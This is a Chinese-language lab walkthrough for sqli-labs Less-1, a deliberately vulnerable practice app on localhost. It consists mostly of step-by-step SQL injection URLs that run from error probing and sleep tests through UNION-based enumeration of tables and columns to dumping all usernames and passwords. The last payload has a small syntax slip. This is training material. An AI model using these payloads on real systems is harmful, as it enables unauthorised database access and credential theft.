sqli-labs-master
Less01:字符型注入
目标网址:http://127.0.0.1/sqli-labs-master/Less-1/
手动注入
http://127.0.0.1/sqli-labs-master/Less-1/?id=1
http://127.0.0.1/sqli-labs-master/Less-1/?id=2
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' and 1=2 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' and sleep(5) --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' union select 1,2,3 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-2' union select 1,2,3 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-2' union select 1,version(),database() --+
//此时,已经获取到的信息有:数据库是security,版本信息:5.7.26
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
//得出了表名:emails,referers,uagents,users
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users' --+
//得出了users表的字段名,发现有username和password
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(0x5e,username,0x5c,password0x5e) from users --+
//获得了所有的账户和密码
sqlmap自动注入
sqlmap.py